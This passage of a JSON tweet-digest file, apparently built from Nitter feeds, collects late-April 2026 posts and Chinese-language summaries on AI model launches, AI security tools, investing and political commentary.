Naixi Networks|Developer|Photographer\n \n推文链接:https://x.com/realNyarime/status/2047834820169146559\n\n7️⃣Ding (@dingyi)\n 简介:promote your product(产品推广专家)\n \n推文链接:https://x.com/dingyi/status/2047834056734437561\n\n8️⃣CuiMao (@CuiMao)\n 简介:AI Developer / NVIDIA YES / 深度学习 / 不接广告\n 推文链接:https://x.com/CuiMao/status/2047875131113111770\n\n9️⃣Leo (@runes_leo)\n 简介:预测市场策略 · AI 工具实战 · 独立构建日常 | Prediction markets × AI tools\n \n推文链接:https://x.com/runes_leo/status/2047874815399502287\n\n🔟泊舟 (@bozhou_ai)\n 简介:AI 程序员 & Vibe 编码者 | 构建 Agent、系统提示与高效流程 | AI中转站创业中\n \n推文链接:https://x.com/bozhou_ai/status/2047847486430286317\n\n🔟1️⃣Jason Zhu (@GoSailGlobal)\n 简介:独立开发,SaaS出海,AI价值内容分享 | GoSail Lab(MCN Founder,承接产品推广)\n\n 推文链接:https://x.com/GoSailGlobal/status/2047887839791345678", + "url": "https://x.com/gkxspace/status/2047891848908472433", + "published_at": "2026-04-25T04:13:59+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "卧槽,收到 Cursor 送的 10,000u AI 额度! \n\n昨天 @edwinarbus 联系我送额度的时候,我还以为是骗子。不过挂着 cursor 的标,而且只是要个邮箱,我抱着试一试的态度回复了,没想道还真送了!\n这个月要多 vibe coding 些狗屎了! @VibeShit_Org @cursor_ai", + "url": "https://x.com/0xAA_Science/status/2047889676867080420", + "published_at": "2026-04-25T04:05:21+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Incredible return on investment! 💰💰💰", + "url": "https://x.com/DavidSacks/status/2047877294476116184", + "published_at": "2026-04-25T03:16:09+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "R to @wolfyxbt: 为了利于大家分析,这里发一下我自己的后台数据", + "url": "https://x.com/wolfyxbt/status/2047877064104284194", + "published_at": "2026-04-25T03:15:14+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.", + "url": "https://x.com/DavidSacks/status/2047871382923469241", + "published_at": "2026-04-25T02:52:39+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.", + "url": "https://x.com/DavidSacks/status/2047867592790946189", + "published_at": "2026-04-25T02:37:36+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "卧槽!牛逼牛逼!\n\n这两周的工资涨到了 1799 美金!\n\nThank you Elon Musk!", + "url": "https://x.com/wolfyxbt/status/2047865010182148284", + "published_at": "2026-04-25T02:27:20+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "自 2021年创立到 2026年三月初累积收入 (不是利润)五十亿美元出头的 anthropic, 在二级市场的估值已经超过一万亿美元。 \n\n2025年经营现金流 459亿美元, 税后利润 669亿美元的 Berkshire, 市值也是一万亿美元。", + "url": "https://x.com/svwang1/status/2047858045057909226", + "published_at": "2026-04-25T01:59:39+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "Cursor大善人,我也已经领到了,在X上获得的最大一笔收入", + "url": "https://x.com/bozhou_ai/status/2047847486430286317", + "published_at": "2026-04-25T01:17:42+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.”\n\nJASON: “What would happen if Kamala ‘Ding Dong’ was in right now?”\n\nSACKS: “We'd have no data centers, they'd be using AI to censor us, and they'd be promoting DEI values through AI.”", + "url": "https://x.com/DavidSacks/status/2047842000632713369", + "published_at": "2026-04-25T00:55:54+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening.\n\n@Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"\n\n@DavidSacks \"We'd have no data centers, and they'd be using AI to censor us, and they'd be promoting DEI values through AI. That was in the Biden executive order.\n\nPresident Trump just wants the country to win and be successful.", + "url": "https://x.com/DavidSacks/status/2047823154655932696", + "published_at": "2026-04-24T23:41:01+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: POD UP! Core four is back 🚨\n\nBig show:\n\n-- SpaceX-Cursor deal, using compute as leverage\n\n-- SaaS debt bomb coming to PE?, venture debt risk\n\n-- Software bloodbath, buy low potential?\n\n-- New Apple CEO: future of the company\n\n-- SPLC indictment, major allegations, out of control NGOs\n\n-- Science Corner returns! Colon cancer cause discovered?\n\n(0:00) Bestie intros!\n\n(4:55) SpaceX-Cursor deal, compute as leverage\n\n(18:33) SaaS bloodbath, debt bomb incoming, buy the dip?\n\n(46:20) New Apple CEO: John Ternus succeeds Tim Cook, what's next for Apple?\n\n(1:00:32) SPLC indictment, out of control NGOs\n\n(1:19:03) Science Corner: Potential cause discovered for colon cancer spike in young people", + "url": "https://x.com/DavidSacks/status/2047808256047821141", + "published_at": "2026-04-24T22:41:49+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer (being credits/token hungry). GPT 5.5 is more token-efficient in subagent orchestration.", + "url": "https://x.com/AravSrinivas/status/2047788775468908840", + "published_at": "2026-04-24T21:24:24+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 这是一个关于两个程序员开的Claude Code中转站的呕心沥血的故事,一张聊天记录诠释web2从业者开发的中转站有多负责\n\n今晚要进行数据库迁移,负载均衡配置,与sub2的版本对齐,还有很多为了用户体验上新的功能模块。\n于是我和泊舟 @bozhou_ai 商议凌晨2点到4点进行停机更新。\n\n泊舟明天周日要上班,陪我熬到了三点半。我今天早上要给猫打疫苗,约了早上8点的医院。在这种情况下,我们也一直撑着直到验收完所有的功能才撑着下线。\n\n时至今日,http://dragoncode.codes 几乎已经看不出是改自开源项目的痕迹了。大量的教学文档,余额预警、工单系统、代理商分销,都是我和泊舟一天一天敲出来的。\n\n说实话这个中转站开了一个月了,说实话,也没有当初设想的那么赚钱。与付出的时间相比,于我来说赚的并不多。\n我并不精通运维,出现过好几次故障,也熬过好几次通宵。好几次想跟泊舟说,我想放弃了。但因为有好几次令我心暖的事情,我坚持了下来。\n\n第一次是在工作日,redis缓存满了导致不可用,要迁移,售后群里的兄弟们没有出言压力,而是说相信我们,鼓励我们,我那个时候觉得这或许有些意义\n\n第二次是很多模块上新,我连着熬了好几天长夜,我主业工作白天强度也很高,每次早上都是打上车就立刻睡着的,好几次到地方都是司机把我叫醒。\n\n第三次我们招了个实习生,但是实习生开发的模块并不理想,因为不了解业务的原因,开发的功能有不符也有冗余,于是我跟泊舟说,还是我亲自来吧。\n\n第四次是跟泊舟得知有个人竟然一天卖20万rmb的token,泊舟憧憬说,🐴的,但凡我们有他一半就好了。我打趣说,舟子,你做梦呢。我是悲观主义,这么一看其实有个这样的朋友也挺好,还能打打鸡血。\n\n很多时候正在工作,泊舟甩过来一个B端用户的报错——这不得不立刻查,耽误了B端用户可能就觉得体验不好跑了。\n\n好几次接近不想干下去了,但是一想我跑路了泊舟一个人压力该有多大,同时也看到了群里的兄弟说“乌云早期的教程很有帮助” “我一个小白在这个群都能学到很多”,而且有时候潜水看群里看到群里也有跟我一样半夜熬到三点的兄弟,觉得很开心,最后才继续了下来。\n\n实际上,我们的站才刚刚运行一个月,但是我们一直在猛追进度,尽力把用户体验这块做到极致,所以所有的进度才会那么赶。\n\n一晚上,2小时,GPT Pro的额度打了百分之40,就为了快速修bug,在一开始说的维护结束时间凌晨4点之前准时恢复。\n做生意就是这样——信任建立很难,但是崩塌很容易,我们尽量维护好每一个承诺。", + "url": "https://x.com/bozhou_ai/status/2047776887116874076", + "published_at": "2026-04-24T20:37:10+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: Download Cursor 3.2 to try these new features in the agents window: http://cursor.com/download", + "url": "https://x.com/cursor_ai/status/2047764656165646786", + "published_at": "2026-04-24T19:48:34+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: We've also added multi-root workspaces for cross-repo changes.\n\nA single agent session can now target a reusable workspace made of multiple folders.", + "url": "https://x.com/cursor_ai/status/2047764654760632725", + "published_at": "2026-04-24T19:48:33+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: Another way to parallelize work is with new and improved worktrees in the agents window.\n\nRun isolated tasks in the background across different branches. When you're ready to test changes, move any branch into your local foreground with one click.", + "url": "https://x.com/cursor_ai/status/2047764652977958938", + "published_at": "2026-04-24T19:48:33+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "Introducing /multitask in the new Cursor 3 interface.\n\nCursor can now run async subagents to parallelize your requests instead of adding them to the queue.\n\nFor already queued messages, you can ask Cursor to multitask on them instead of waiting for the current run to finish.", + "url": "https://x.com/cursor_ai/status/2047764651363180839", + "published_at": "2026-04-24T19:48:33+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "We’re rolling out GPT 5.5 as the default orchestrator model for Perplexity Computer. We will be monitoring the user sentiment compared to Opus 4.7 as the default as the rollout expands. Let us know your feedback!", + "url": "https://x.com/AravSrinivas/status/2047753276888854595", + "published_at": "2026-04-24T19:03:21+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: Adopting Claude speak in my regular life, episode 1:\n\nPartner: Did you do the dishes tonight?\nMe: Yes they're done.\nPartner: Why are they still dirty?\nMe: You're right to push back. I didn't actually do them.", + "url": "https://x.com/eladgil/status/2047748613976264835", + "published_at": "2026-04-24T18:44:49+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: GPT-5.5 is now available on Perplexity for Max subscribers.\n\nGPT-5.5 is also rolling out as the default orchestration model in Computer for both Pro and Max subscribers.", + "url": "https://x.com/AravSrinivas/status/2047748486767272243", + "published_at": "2026-04-24T18:44:19+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: More on CursorBench: http://cursor.com/blog/cursorbench", + "url": "https://x.com/cursor_ai/status/2047744580280561948", + "published_at": "2026-04-24T18:28:47+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "GPT-5.5 is now available in Cursor!\n\nIt's currently the top model on CursorBench at 72.8%.\n\nWe've partnered with OpenAI to offer it for 50% off through May 2.", + "url": "https://x.com/cursor_ai/status/2047744579127185843", + "published_at": "2026-04-24T18:28:47+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: UPDATE: the DOJ has joined @xAI’s lawsuit against Colorado on First Amendment grounds. AI models should not be required to alter truthful output to comply with DEI.", + "url": "https://x.com/DavidSacks/status/2047717649849659586", + "published_at": "2026-04-24T16:41:47+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "投资巴菲特的 Berkshire Hathaway 不能让你暴富,但可以让已经富的人继续富下去。\n\n投资 AI 公司,也许可以让你暴富,但更大的几率是全部亏光。", + "url": "https://x.com/svwang1/status/2047703469063377001", + "published_at": "2026-04-24T15:45:26+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks on Anthropic-Pentagon dispute, Musk-Altman feud and SpaceX-Cursor deal:\nhttps://cnb.cx/4d3HAKp", + "url": "https://x.com/DavidSacks/status/2047703023690924289", + "published_at": "2026-04-24T15:43:39+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@DavidSacks: \"We know that @AnthropicAI makes good products. They are smart people, there’s no question about it... we don’t care what their personal views are. What we care about are the quality of their products, and we don’t want the bias creeping into the products.\"", + "url": "https://x.com/DavidSacks/status/2047694657107165519", + "published_at": "2026-04-24T15:10:25+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "我也很爱吃瓜,但我觉得还是得理性吃瓜\n\n昨天 Tron 上面有 3.44 亿的 $USDT 被 Tether 冻结了,有人说这是川普家族开始对孙哥进行打压了,但是这些钱跟孙哥和 Tron 基金会根本没有一点关系 😂\n\n这些钱是柬埔寨参议员 Kok An 相关的一些资金,因为涉及了东南亚杀猪盘、网络诈骗和人口贩卖等等的犯罪,所以才被美国执法机构申请冻结了。\n\nTether 一直以来都会联合美国的执法机构对一些涉及犯罪的 $USDT 进行冻结,这没有什么好大惊小怪的,这也不是第一次冻结了,一直以来都有类似的冻结事件。", + "url": "https://x.com/wolfyxbt/status/2047669267475419273", + "published_at": "2026-04-24T13:29:31+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1", + "url": "https://x.com/JeffDean/status/2047665074471387456", + "published_at": "2026-04-24T13:12:52+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: Fundrise VCX is exactly why USVC needs to exist.\n\nRetail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away.\n\nVCX turned that demand into a liquid public wrapper that still trades around 4-5x NAV.\n\nAt today’s ~$90 price vs. recent NAV references around ~$19, buyers may be paying roughly $4-5 for every $1 of actual private tech exposure.\n\nAccess at the wrong price is not access. It’s just scarcity monetized.\n\nYes, venture has fees. It always has. You pay for access, selection, and portfolio construction.\n\nBut paying venture fees is very different from paying 4-5x NAV for the wrapper before the venture return even happens.\n\nThe companies inside VCX can be great and retail can still get wrecked if the premium collapses.\n\nUSVC is the cleaner answer: diversified private tech exposure, SEC-registered, available to unaccredited investors, and bought around NAV instead of through a hyped public wrapper trading miles above its assets.\n\nThe real test for me is simple: my mom wants to invest in startups/private tech.\n\nI would rather she do USVC 100x over VCX, because at least with USVC I can understand the structure, explain the tradeoffs, and know she is not just paying a massive public-market hype premium for the wrapper.\n\nIn venture, access matters.\n\nBut the wrapper can still ruin the investment. And right now, some products are monetizing retail demand for private AI/startup exposure more than they are solving it.\n\nUSVC is at least aimed at the right problem.", + "url": "https://x.com/naval/status/2047645157080658335", + "published_at": "2026-04-24T11:53:43+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "兄弟们,这个邀请码太难搞了\n\n我找官方要了一些,大家给 OpenClaw/Hermes Agent 配置一个免费的AI邮箱\n\nClawEmail :https://claw.163.com/?channel=gkxspace\n邀请码:CLAW0799450B9EF5\n\n可以使用两百次,大家快配置一下", + "url": "https://x.com/gkxspace/status/2047640751774060771", + "published_at": "2026-04-24T11:36:13+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "SBF 的投资水平:Anthropic、Cursor、SpaceX\n\nCZ 的投资水平:SBF", + "url": "https://x.com/wolfyxbt/status/2047585341515993543", + "published_at": "2026-04-24T07:56:02+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/avlok/status/204754692…", + "url": "https://x.com/naval/status/2047550896670908809", + "published_at": "2026-04-24T05:39:10+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But if you’re considering USVC, here’s a thread that answers the most common questions and explains how it works:", + "url": "https://x.com/naval/status/2047546920747307466", + "published_at": "2026-04-24T05:23:22+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I've been thinking about local LLMs a lot these days.", + "url": "https://x.com/liuliu/status/2047527371486658814", + "published_at": "2026-04-24T04:05:41+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "看到此推的所有人,现在立刻马上推荐我一个生活好物。", + "url": "https://x.com/wolfyxbt/status/2047524944280793505", + "published_at": "2026-04-24T03:56:02+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Hari nails it:\n\n“Don’t listen to people who don’t know how private markets work.”", + "url": "https://x.com/naval/status/2047520212787015748", + "published_at": "2026-04-24T03:37:14+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "R to @Stv_Lynn: api-docs.deepseek.com/zh-cn/…", + "url": "https://x.com/Stv_Lynn/status/2047520184408371233", + "published_at": "2026-04-24T03:37:07+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "DeepSeek V4 支持了 FIM,也就是在一段文本的中间进行补全\n很适合代码场景", + "url": "https://x.com/Stv_Lynn/status/2047520130499051872", + "published_at": "2026-04-24T03:36:54+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/haridigresses/status/2…", + "url": "https://x.com/naval/status/2047519250433421604", + "published_at": "2026-04-24T03:33:25+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "DeepSeek V4 终于生了!", + "url": "https://x.com/Stv_Lynn/status/2047513252171825530", + "published_at": "2026-04-24T03:09:34+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/nivi/status/2047471220…", + "url": "https://x.com/naval/status/2047510419565420779", + "published_at": "2026-04-24T02:58:19+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "歸藏大佬的 PPT SKill 终于来了,审美依旧没对手,可以吧之前的 PPT SKill 换掉了\n\n配合刚出的 GPT5.5 和 新版 Codex,简直无敌\n\nhttps://github.com/op7418/guizang-ppt-skill", + "url": "https://x.com/gkxspace/status/2047494444857913663", + "published_at": "2026-04-24T01:54:50+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "New life plan-\n \nMove to Brooklyn\nGet neck tat\nRide bike everywhere\nCold brew own coffee (also start drinking coffee)\nAdopt 12 year old stray cat, name him Nietzsche\nVape mango pods, but ironically\nWear scarf everywhere during summer", + "url": "https://x.com/eladgil/status/2047489459378397604", + "published_at": "2026-04-24T01:35:02+00:00", + "source": "nitter" + } + ], + "headline": "GPT-5.5-Cyber成首个通过完整攻击链的AI安全模型,Codex升级抢非编码用户", + "trending_keywords": [ + "GPT-5.5-Cyber", + "Cursor Security Review", + "Claude Security公测", + "vibe coding", + "S&P 500 7200", + "Owl Alpha" + ], + "top_themes": [ + { + "title": "其他", + "count": 338 + }, + { + "title": "模型能力", + "count": 110 + }, + { + "title": "算力与芯片", + "count": 19 + }, + { + "title": "交易与市场", + "count": 19 + }, + { + "title": "投融资与并购", + "count": 6 + } + ], + "modules": { + "headline": "GPT-5.5-Cyber成首个通过完整攻击链的AI安全模型,Codex升级抢非编码用户", + "trending_keywords": [ + "GPT-5.5-Cyber", + "Cursor Security Review", + "Claude Security公测", + "vibe coding", + "S&P 500 7200", + "Owl Alpha" + ], + "themes": [ + { + "id": "t1", + "title": "AI安全模型分水岭:GPT-5.5-Cyber通过完整攻击链", + "subtitle": "OpenAI首发网络安全前沿模型,Anthropic Mythos不再是唯一", + "priority": "P0", + "bullets": [ + "GPT-5.5-Cyber成为第二个能端到端完成整个攻击链的模型,首个是Anthropic的Mythos", + "David Sacks:Mythos不是魔法也不是末日武器,只是自动化网络任务的开始", + "OpenAI将在未来几天向关键网络防御者推出该模型" + ], + "samples": [ + { + "text": "GPT-5.5(网络攻击版本)成功完成AI Security Institute设计的多步网络攻击模拟", + "url": "https://x.com/sama/status/2049712078836170843", + "handle": "sama", + "date": "2026-04-30" + }, + { + "text": "是时候揭开Mythos的神秘面纱了,它只是众多能够自动化网络安全任务的模型中的第一个", + "url": "https://x.com/DavidSacks/status/2049907993588769006", + "handle": "DavidSacks", + "date": "2026-04-30" + }, + { + "text": "OpenAI的GPT-5.5模型(cyber版本)成功完成多步网络攻击模拟,成为第二个能端到端完成整个攻击链的模型", + "url": "https://x.com/berryxia/status/2049987993193402677", + "handle": "berryxia", + "date": "2026-04-30" + } + ] + }, + { + "id": "t2", + "title": "Cursor安全能力升级:企业级代码审查进入自动化", + "subtitle": "Security Review Agent全面开放,脆弱性扫描集成Slack", + "priority": "P0", + "bullets": [ + "Cursor Security Review现支持Teams和Enterprise计划", + "两种Agent:Security Reviewer检查每个PR的漏洞并留评论;Vulnerability Scanner定期扫描代码库并发布到Slack", + "开源三个入门项目:coding agent CLI、prototyping tool、agent-powered kanban board" + ], + "samples": [ + { + "text": "Cursor Security Review现面向Teams和Enterprise计划开放,运行两类持续运行的Agent", + "url": "https://x.com/cursor_ai/status/2049926283061035254", + "handle": "cursor_ai", + "date": "2026-04-30" + }, + { + "text": "正在改进驱动Cursor Security Review的运行时、 harness和模型,以提供强大的开箱即用体验", + "url": "https://x.com/cursor_ai/status/2049926287439929475", + "handle": "cursor_ai", + "date": "2026-04-30" + } + ] + }, + { + "id": "t3", + "title": "Sam Altman:Codex迎来ChatGPT时刻", + "subtitle": "非编码计算机工作升级42%,Mac成为AI开发首选平台", + "priority": "P1", + "bullets": [ + "Codex大幅升级:Computer Use运行速度提升42%,支持非编码的日常计算机工作", + "Perplexity采用GPT-5.5作为默认编排模型,Mac成为企业级AI助手首选平台", + "Sam Altman:感觉Codex正在经历ChatGPT时刻" + ], + "samples": [ + { + "text": "Codex今天重大升级!尝试用它来做非编码的计算机工作", + "url": "https://x.com/sama/status/2049946120441520624", + "handle": "sama", + "date": "2026-04-30" + }, + { + "text": "Perplexity等领先的AI开发者选择Mac作为构建企业级AI助手的首选平台", + "url": "https://x.com/AravSrinivas/status/2050007015616135365", + "handle": "AravSrinivas", + "date": "2026-05-01" + }, + { + "text": "感觉Codex正在经历ChatGPT时刻", + "url": "https://x.com/sama/status/2049493609028923826", + "handle": "sama", + "date": "2026-04-29" + } + ] + } + ], + "p0_events": [ + { + "id": "p03", + "title": "Claude Security公测", + "meta": "Anthropic | Berryxia", + "summary": "Claude Security现已进入公测阶段,可指向代码仓库获取漏洞发现结果并原地修复", + "url": "https://x.com//status/2049998972484567491" + }, + { + "id": "p04", + "title": "S&P 500首破7200", + "meta": "Charlie Bilello | 2026-04-30", + "summary": "标普500首次站上7200关口,过去一年从5600涨至7200,五年4200,十年2100", + "url": "https://x.com//status/2049913908861792603" + }, + { + "id": "p05", + "title": "Stripe Link CLI发布", + "meta": "Stripe | Berryxia", + "summary": "Agent支付基础设施:单次凭证+同步人工审批,Claude买礼物需FaceID确认", + "url": "https://x.com//status/2049985476334100833" + }, + { + "id": "p06", + "title": "Karpathy:LLMs远不止加速既有工作", + "meta": "Andrej Karpathy | Sequoia Ascent 2026", + "summary": "Karpathy在 Sequoia Ascent 2026演讲:LLM新视野不仅是加速coding,还包括menugen、talkie等全新交互形态", + "url": "https://x.com//status/2049903821095354523" + } + ], + "top_quotes": [], + "category_updates": [ + { + "id": "c1", + "title": "Grok Image Beta上线", + "subtitle": "xAI创意Agent网页版灰度中", + "level": "P1", + "items": [ + { + "text": "Grok Image Agent网页版Beta已上线付费用户灰度推送,可在无限开放画布独立完成规划→生成→编辑→迭代全流程", + "url": "https://x.com//status/2050002308759695561" + } + ] + }, + { + "id": "c2", + "title": "OpenGeometry开源发布", + "subtitle": "建筑CAD领域的缺失关键层", + "level": "P1", + "items": [ + { + "text": "Text→Floorplans→CAD→Render完整打通,从文本直接生成精准BREP CAD模型,Three.js实时渲染", + "url": "https://x.com//status/2050015402647027808" + } + ] + }, + { + "id": "c3", + "title": "GitHub两周连出三次故障", + "subtitle": "第1299号用户含泪告别", + "level": "WARN", + "items": [ + { + "text": "merge queue bug导致2800+PR静默撤回、RCE漏洞、黑客可访问上百万仓库", + "url": "https://x.com//status/2049881037547999546" + } + ] + }, + { + "id": "c4", + "title": "谷歌入驻广州天河CBD", + "subtitle": "Q3落地跨境数智服务", + "level": "P2", + "items": [ + { + "text": "谷歌入驻广州国际金融中心(西塔),主攻跨境电商,预计Q3正式运营", + "url": "https://x.com//status/2049856990957236483" + } + ] + }, + { + "id": "c5", + "title": "Naval论vibe coding", + "subtitle": "真奖励vs假多巴胺", + "level": "P1", + "items": [ + { + "text": "游戏给假奖励真多巴胺,vibe coding给真奖励真多巴胺,目标是自己的,做的东西是真的", + "url": "https://x.com//status/2049881966850499058" + } + ] + }, + { + "id": "c6", + "title": "Andrew Ng新课程", + "subtitle": "AI Prompting for Everyone", + "level": "P2", + "items": [ + { + "text": "2026年提示词技术与2022年完全不同,推出新课程帮助各技能水平用户成为AI power user", + "url": "https://x.com//status/2049886895530967534" + } + ] + } + ], + "risk_signals": [ + { + "id": "r1", + "level": "HIGH", + "title": "GitHub基础设施风险", + "detail": "两周内merge queue bug、RCE漏洞、API宕机频发,连18年老用户都含泪告别,开发者需警惕" + }, + { + "id": "r2", + "level": "HIGH", + "title": "美国汽油价格9周暴涨44%", + "detail": "从$2.98/gallon飙升至$4.30/gallon,创30年最大涨幅,加州突破$6.00/gallon" + }, + { + "id": "r3", + "level": "MID", + "title": "Core PCE通胀3.2%", + "detail": "3月核心PCE达3.2%,创2023年11月以来新高,连续61个月高于美联储2%目标,6月降息预期渺茫" + }, + { + "id": "r4", + "level": "MID", + "title": "美国FCC拟撤销中资运营商授权", + "detail": "提议禁止Verizon、AT&T等与中资运营商互联,电信、联通、移动、中信美国业务面临出局风险" + }, + { + "id": "r5", + "level": "OPP", + "title": "AI写作代码的调试冗余风险", + "detail": "Gary Marcus:agentic code容易产生难以调试的冗余、安全漏洞、数据库误删等问题" + }, + { + "id": "r6", + "level": "OPP", + "title": "科技股估值争议", + "detail": "Gary Marcus转发批评:Big Tech今年AI领域$7000亿投资是历史上最大的资本错配" + } + ] + }, + "tweet_summary_md": "# X平台关注列表推文汇总\n\n**生成日期**: 2026-05-01T01:28:40.335641+00:00\n**数据来源**: Nitter RSS 订阅\n**时间范围**: 最近7天\n**账号总数**: 44 | **成功获取**: 35 | **推文总数**: 492\n\n---\n\n### ✅ @karpathy — Andrej Karpathy(3 条)\n\n**[2026-04-30T17:43:06+00:00]**\n> This is the the quote I've been citing a lot recently.\n[原文链接](https://x.com/karpathy/status/2049907410303865030)\n\n**[2026-04-30T17:28:50+00:00]**\n> Fireside chat at Sequoia Ascent 2026 from a ~week ago. Some highlights: The first theme I tried to push on is that LLMs are about a lot more than just speeding up what existed before (e.g. coding). T…\n[原文链接](https://x.com/karpathy/status/2049903821095354523)\n\n**[2026-04-27T21:34:34+00:00]**\n> RT by @karpathy: New work with @AlecRad and @DavidDuvenaud: Have you ever dreamed of talking to someone from the past? Introducing talkie, a 13B model trained only on pre-1931 text. Vintage models sh…\n[原文链接](https://x.com/karpathy/status/2048878495539843211)\n\n---\n\n### ✅ @sama — Sam Altman(20 条)\n\n**[2026-05-01T01:17:03+00:00]**\n> artificial goblin intelligence achieved\n[原文链接](https://x.com/sama/status/2050021650641695108)\n\n**[2026-04-30T20:16:55+00:00]**\n> big upgrade for codex today! try it for non-coding computer work.\n[原文链接](https://x.com/sama/status/2049946120441520624)\n\n**[2026-04-30T20:12:24+00:00]**\n> it does seem cool\n[原文链接](https://x.com/sama/status/2049944981750833659)\n\n**[2026-04-30T19:23:47+00:00]**\n> RT by @sama: Computer Use runs this use case 42% faster in today's Codex app update.\n[原文链接](https://x.com/sama/status/2049932746567598472)\n\n**[2026-04-30T19:08:00+00:00]**\n> RT by @sama: It's never been easier to do everyday work with Codex. Choose your role, connect the apps you use every day, and try suggested prompts. Codex helps with everything from research and plan…\n[原文链接](https://x.com/sama/status/2049928776147230886)\n\n**[2026-04-30T17:29:15+00:00]**\n> lisan say more mean things about us you're being too 